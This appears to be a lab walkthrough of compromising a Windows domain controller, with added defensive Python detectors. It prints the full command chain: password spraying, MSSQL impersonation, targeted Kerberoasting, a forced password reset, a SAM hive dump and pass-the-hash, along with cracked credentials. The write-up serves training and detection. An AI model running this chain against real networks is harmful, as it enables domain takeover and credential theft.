Open WDavid404 opened 2 months ago
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-12 06:57:26Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s syn-ack ttl 125 Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8530/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
8531/tcp open unknown syn-ack ttl 125
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
47001/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49675/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49684/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49685/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49691/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49700/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49701/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49712/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49769/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
58538/tcp open ms-sql-s syn-ack ttl 125 Microsoft SQL Server 2019 15.00.2000.00; RTM
smbmap -u null -p "" -H 192.168.218.40 -P 445 -r 2>&1 --> no info
kerbrute -domain hokkaido-aerospace.com -dc-ip 192.168.184.40 -users /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 100
-->
users:
info
administrator
discovery
maintenance
Create a small password wordlist:
Winter2023
Summer2023
Spring2023
Fall2023
info
administrator
discovery
maintenance
ofni
rotartsinimda
yrevocsid
ecnanetniam
Let's brute-force using crackmapexec:
crackmapexec smb 192.168.184.40 --shares -u users.txt -p pass.txt --continue-on-success
--> info:info
crackmapexec smb 192.168.184.40 --shares -u info -p info
On the Homes share there are directories named after each user; nothing of interest inside them.
On the NETLOGON share there is a temp folder containing a file password_reset.txt.
That text file contains this text:
Initial Password: Start123!
crackmapexec smb 192.168.184.40 -u users.txt -p Start123! --continue-on-success
-->
discovery:Start123!
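Both sprays above (four users against a few seasonal passwords, then the whole user list against Start123!) produce one or two failures per account spread over many accounts, which is the shape a lockout threshold never catches. The following is an added example, not part of the original post, written from the defender's side: it runs over constructed 4625/4624 records (the sample events and source addresses are made up for this example) and flags a source that fails against several distinct accounts inside a short window, then lists which of those accounts logged on successfully afterwards.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security events as the DC would log them (not real log data):
# 4625 = failed logon, 4624 = successful logon; "src" is the Source Network Address.
SAMPLE_EVENTS = [
    {"ts": "2024-08-12T07:00:01", "id": 4625, "user": "info", "src": "192.168.45.200"},
    {"ts": "2024-08-12T07:00:02", "id": 4625, "user": "administrator", "src": "192.168.45.200"},
    {"ts": "2024-08-12T07:00:02", "id": 4625, "user": "discovery", "src": "192.168.45.200"},
    {"ts": "2024-08-12T07:00:03", "id": 4625, "user": "maintenance", "src": "192.168.45.200"},
    {"ts": "2024-08-12T07:00:04", "id": 4624, "user": "info", "src": "192.168.45.200"},
    # one mistyped password from a workstation, then success: normal user behaviour
    {"ts": "2024-08-12T07:30:00", "id": 4625, "user": "molly.smith", "src": "192.168.45.77"},
    {"ts": "2024-08-12T07:31:00", "id": 4624, "user": "molly.smith", "src": "192.168.45.77"},
]


def _ts(e):
    return datetime.fromisoformat(e["ts"])


def detect_spray(events, min_accounts=3, window=timedelta(minutes=5)):
    """Password-spray heuristic: one source fails against >= min_accounts *distinct*
    users inside `window`. A per-account lockout rule never fires on this pattern,
    because each account sees only one or two failures. Returns one finding per
    source, listing the sprayed accounts and any that later logged on successfully."""
    by_src = defaultdict(list)
    for e in sorted(events, key=_ts):
        by_src[e["src"]].append(e)

    findings = []
    for src, evs in by_src.items():
        failures = [e for e in evs if e["id"] == 4625]
        for i, first in enumerate(failures):           # sliding window over failures
            start = _ts(first)
            sprayed = {e["user"] for e in failures[i:] if _ts(e) - start <= window}
            if len(sprayed) < min_accounts:
                continue
            compromised = sorted({e["user"] for e in evs
                                  if e["id"] == 4624 and e["user"] in sprayed
                                  and _ts(e) >= start})
            findings.append({"src": src, "start": first["ts"],
                             "accounts": sorted(sprayed), "compromised": compromised})
            break                                       # one finding per source is enough
    return findings


if __name__ == "__main__":
    for f in detect_spray(SAMPLE_EVENTS):
        print(f"{f['src']} sprayed {len(f['accounts'])} accounts from {f['start']}; "
              f"successful afterwards: {f['compromised'] or 'none'}")
```

Tune min_accounts and window to the environment. SMB-based sprays reach the DC as 4625 with the attacker's address in Source Network Address; Kerberos-based ones appear as 4771 pre-authentication failures carrying a Client Address, so the same grouping logic applies to either stream. The other lesson from this step is hygiene rather than detection: NETLOGON is readable by every domain user, so an initial password left in a text file there is effectively public.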
evil-winrm login ---> all failed
impacket-GetUserSPNs -dc-ip 192.168.184.40 hokkaido-aerospace.com/discovery:Start123! -request
Tried to crack maintenance user’s hash but failed.
Tried the MSSQL server with discovery's credentials, which succeeded.
impacket-mssqlclient 'hokkaido-aerospace.com/discovery':'Start123!'@192.168.208.40 -dc-ip 192.168.184.40 -windows-auth
Check which databases are available. For MSSQL commands, refer to https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md
SQL (HAERO\discovery guest@master)> SELECT name FROM master..sysdatabases;
SQL (HAERO\discovery guest@master)> use hrappdb
--> ERROR: Line 1: The server principal "HAERO\discovery" is not able to access the database "hrappdb" under the current security context.
--> We don't have permission to use hrappdb. Let's check whether there is any login we can impersonate on MSSQL.
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
-->
hrappdb-reader
--> Let's switch to the login "hrappdb-reader" and use the "hrappdb" database.
SQL (HAERO\discovery guest@master)> EXECUTE AS LOGIN = 'hrappdb-reader'
SQL (hrappdb-reader guest@master)> use hrappdb
--> Let's view the data:
SQL (hrappdb-reader hrappdb-reader@hrappdb)> SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
SQL (hrappdb-reader hrappdb-reader@hrappdb)> select * from sysauth;
--> hrapp-service:Untimed$Runny
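The impersonation hop above (discovery becomes hrappdb-reader, which can read hrappdb) is exactly the path a DBA audit should enumerate, and EXECUTE AS LOGIN can be nested, so a grant that looks harmless on its own can end at a sysadmin. The following is an added example, not from the original post: it takes a constructed list of IMPERSONATE grants (only the discovery to hrappdb-reader edge mirrors the page; the app-ops and sa hops are invented to show a chain) plus a constructed map of database access, computes the transitive closure per login and reports what each grant effectively gives away.

```python
from collections import defaultdict, deque

# Constructed IMPERSONATE grants as (grantee, login it may EXECUTE AS). Only the first
# edge mirrors the page; the app-ops and sa hops are invented to show a chain.
IMPERSONATE_GRANTS = [
    ("HAERO\\discovery", "hrappdb-reader"),
    ("hrappdb-reader", "app-ops"),
    ("app-ops", "sa"),
    ("report-user", "report-reader"),
]
# Constructed: databases each login can use directly ("*" = all), and sysadmin logins.
DB_ACCESS = {
    "HAERO\\discovery": {"master"},
    "hrappdb-reader": {"master", "hrappdb"},
    "app-ops": {"master", "opsdb"},
    "sa": {"*"},
    "report-user": {"master"},
    "report-reader": {"master", "reports"},
}
SYSADMINS = {"sa"}


def impersonation_closure(login, grants):
    """All logins `login` can become through nested EXECUTE AS LOGIN (transitive closure),
    including itself. BFS over the grant graph; cycles are handled by the seen set."""
    edges = defaultdict(set)
    for grantee, target in grants:
        edges[grantee].add(target)
    seen, queue = {login}, deque([login])
    while queue:
        cur = queue.popleft()
        for nxt in edges[cur] - seen:
            seen.add(nxt)
            queue.append(nxt)
    return seen


def audit_impersonation(grants, db_access, sysadmins):
    """Per login holding a grant: which logins it can reach, which databases that adds
    beyond its own, and whether any hop lands on a sysadmin (effectively full control)."""
    findings = {}
    for login in sorted({g for g, _ in grants}):
        reach = impersonation_closure(login, grants) - {login}
        gained = set().union(*(db_access.get(p, set()) for p in reach)) - db_access.get(login, set())
        findings[login] = {
            "via": sorted(reach),
            "extra_databases": sorted(gained),
            "reaches_sysadmin": bool(reach & sysadmins),
        }
    return findings


if __name__ == "__main__":
    for login, f in audit_impersonation(IMPERSONATE_GRANTS, DB_ACCESS, SYSADMINS).items():
        flag = "  <-- revoke or justify" if f["reaches_sysadmin"] else ""
        print(f"{login}: can become {f['via']}, gains {f['extra_databases']}{flag}")
```

In a real audit the edges come from the same sys.server_permissions / sys.server_principals join used above (the login being impersonated is the row's major_id, the grantee is grantee_principal_id) and sysadmin membership from IS_SRVROLEMEMBER('sysadmin', name). Any login whose finding reaches a sysadmin, or gains a database it was deliberately denied, should have the grant revoked unless the chain is documented.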
WinRM login with these creds, but no luck.
Use BloodHound:
bloodhound-python -u "hrapp-service" -p 'Untimed$Runny' -d hokkaido-aerospace.com -c all --zip -ns 192.168.208.40
-->
hrapp-service has GenericWrite permission over the user Hazel.Green, who is a Tier 2 admin.
targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny' --dc-ip 192.168.208.40
-->
Got the hash of the hazel.green user.
Cracking the hash gives the password: haze1988
(targetedKerberoast.py: This tool brings the following additional feature: for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), print the "kerberoast" hash, and delete the temporary SPN set for that operation. This is called targeted Kerberoasting.)
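The sequence the tool description spells out (write an SPN onto a user, request a ticket for it, remove the SPN) leaves a very specific trail on the DC. The following is an added example, not from the original post or the tool's project: a correlation over constructed 5136 (directory object modified) and 4769 (service ticket requested) records, with the SPN value, the timestamps and the benign svc-web case all made up for the example, that pairs an SPN add on a user object with a ticket request for that user inside a short window and raises confidence when the same SPN is deleted again.

```python
from datetime import datetime, timedelta

# Constructed DC events (not real logs). 5136 = directory object modified, which needs
# "Audit Directory Service Changes" plus a SACL on user objects; op is the value
# add/delete. 4769 = service ticket requested; etype 0x17 is RC4-HMAC, the type
# roasting tools ask for because it cracks fastest, 0x12 is AES256.
SAMPLE = [
    {"ts": "2024-08-12T08:00:00", "id": 5136, "subject": "hrapp-service", "object": "hazel.green",
     "attr": "servicePrincipalName", "op": "add", "value": "HTTP/temp-spn-1234"},
    {"ts": "2024-08-12T08:00:01", "id": 4769, "service": "hazel.green",
     "requester": "hrapp-service", "etype": 0x17},
    {"ts": "2024-08-12T08:00:02", "id": 5136, "subject": "hrapp-service", "object": "hazel.green",
     "attr": "servicePrincipalName", "op": "delete", "value": "HTTP/temp-spn-1234"},
    # benign: an admin registers a real SPN on a service account; normal AES ticket use follows later
    {"ts": "2024-08-12T09:00:00", "id": 5136, "subject": "domain-admin", "object": "svc-web",
     "attr": "servicePrincipalName", "op": "add", "value": "HTTP/web01.hokkaido-aerospace.com"},
    {"ts": "2024-08-12T09:30:00", "id": 4769, "service": "svc-web",
     "requester": "alice", "etype": 0x12},
]


def _ts(e):
    return datetime.fromisoformat(e["ts"])


def detect_targeted_kerberoast(events, window=timedelta(minutes=10)):
    """Flag an SPN added to a user object that is followed within `window` by a service
    ticket request for that same user. A delete of the same SPN value inside the window
    is the cleanup step of the tool and raises confidence; RC4 use is recorded separately."""
    events = sorted(events, key=_ts)
    findings = []
    for i, e in enumerate(events):
        if not (e["id"] == 5136 and e["attr"] == "servicePrincipalName" and e["op"] == "add"):
            continue
        t0 = _ts(e)
        ticket = rc4 = cleanup = False
        for f in events[i + 1:]:
            if _ts(f) - t0 > window:
                break
            if f["id"] == 4769 and f["service"] == e["object"]:
                ticket = True
                rc4 = rc4 or f["etype"] == 0x17
            elif (f["id"] == 5136 and f["object"] == e["object"]
                  and f["op"] == "delete" and f["value"] == e["value"]):
                cleanup = True
        if ticket:
            findings.append({"writer": e["subject"], "victim": e["object"], "spn": e["value"],
                             "rc4": rc4, "spn_removed": cleanup,
                             "confidence": "high" if cleanup else "medium"})
    return findings


if __name__ == "__main__":
    for f in detect_targeted_kerberoast(SAMPLE):
        print(f"[{f['confidence']}] {f['writer']} set SPN {f['spn']} on {f['victim']}, "
              f"ticket requested (RC4={f['rc4']}), SPN removed={f['spn_removed']}")
```

Without "Audit Directory Service Changes" and a SACL covering servicePrincipalName, the add/delete pair is invisible and all that remains is a 4769 with RC4 for an account that never legitimately had an SPN, which is still worth alerting on. The root cause to fix is the GenericWrite grant itself: a service account should not hold write rights over a Tier 2 admin, and BloodHound output is the quickest way to find such edges before someone else does.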
In BloodHound we can see hazel.green is a member of the IT group, so we can force-change the password of the Tier 1 admin MOLLY.SMITH. Let's use rpcclient to set the password.
rpcclient -N 192.168.208.40 -U 'hazel.green%haze1988'
$> setuserinfo2 MOLLY.SMITH 23 'Password123!'
Log in with MOLLY.SMITH's credentials:
xfreerdp /u:molly.smith /p:'Password123!' /v:192.168.208.40 +clipboard
whoami /priv
--> SeBackupPrivilege
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
[Kali] impacket-secretsdump -system system -sam sam local
-->
[*] Target system bootKey: 0x2fcb0ca02fb5133abd227a05724cd961
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
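SeBackupPrivilege lets molly.smith read the SAM and SYSTEM hives regardless of their ACLs, and reg save is the usual way to do it, so those two command lines are the thing to watch for. The following is an added example, not from the original post: a detection over constructed process-creation records (4688 or Sysmon Event 1 style; the hostnames, the query/export lines and the exact paths are made up, modelled on the two reg save commands above) that normalises the command line and flags saves or exports of the SAM, SECURITY or SYSTEM hives, marking the SAM+SYSTEM pair from one user on one host as a full dump because both are needed to decrypt the hashes.

```python
import re

# Constructed process-creation records in 4688 / Sysmon Event 1 style (not real logs);
# the two molly.smith lines mirror the reg save commands used above.
SAMPLE_PROCS = [
    {"host": "DC01", "user": "HAERO\\molly.smith", "cmd": r'reg  save hklm\sam c:\Temp\sam'},
    {"host": "DC01", "user": "HAERO\\molly.smith",
     "cmd": r'"C:\Windows\System32\reg.exe" SAVE "HKLM\SYSTEM" C:\Temp\system'},
    {"host": "DC01", "user": "NT AUTHORITY\\SYSTEM",
     "cmd": r'reg query hklm\software\microsoft\windows\currentversion /v ProgramFilesDir'},
    {"host": "WS02", "user": "HAERO\\alice", "cmd": r'reg export HKCU\Software\MyApp backup.reg'},
]

SENSITIVE_HIVES = {"sam", "security", "system"}
_ARG = re.compile(r'"[^"]*"|\S+')          # split on whitespace, keep quoted args whole
_HIVE = re.compile(r"(?:hklm|hkey_local_machine)\\([a-z]+)(?:\\.*)?")


def classify_reg_command(cmd):
    """Return the hive name if `cmd` runs reg.exe save/export on SAM, SECURITY or SYSTEM,
    else None. Normalises case, quoting, repeated spaces and a full path to reg.exe."""
    argv = [a.strip('"') for a in _ARG.findall(cmd)]
    if len(argv) < 3:
        return None
    exe = argv[0].lower().rsplit("\\", 1)[-1]
    if exe not in ("reg", "reg.exe") or argv[1].lower() not in ("save", "export"):
        return None
    m = _HIVE.fullmatch(argv[2].lower())
    return m.group(1) if m and m.group(1) in SENSITIVE_HIVES else None


def find_hive_dumps(procs):
    """One finding per sensitive-hive save. SAM and SYSTEM from the same user on the
    same host are marked full_dump: SYSTEM holds the boot key that decrypts SAM."""
    hits = []
    for p in procs:
        hive = classify_reg_command(p["cmd"])
        if hive:
            hits.append(dict(p, hive=hive))
    findings = []
    for h in hits:
        siblings = {x["hive"] for x in hits if (x["host"], x["user"]) == (h["host"], h["user"])}
        findings.append({"host": h["host"], "user": h["user"], "hive": h["hive"],
                         "full_dump": {"sam", "system"} <= siblings})
    return findings


if __name__ == "__main__":
    for f in find_hive_dumps(SAMPLE_PROCS):
        print(f"{f['host']}: {f['user']} saved {f['hive'].upper()} hive"
              + (" (SAM+SYSTEM: full offline dump possible)" if f["full_dump"] else ""))
```

reg.exe is not the only way to read those hives, so treat this as one signal alongside Sensitive Privilege Use auditing (4673/4674 for SeBackupPrivilege) and the question the walkthrough really raises: why a Tier 1 admin account holds backup rights on a domain controller in the first place.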
Now evil-winrm to the machine using the administrator account:
evil-winrm -i 192.168.184.40 -u administrator -H "d752482897d54e239376fddb2a2109e4"
Keypoints: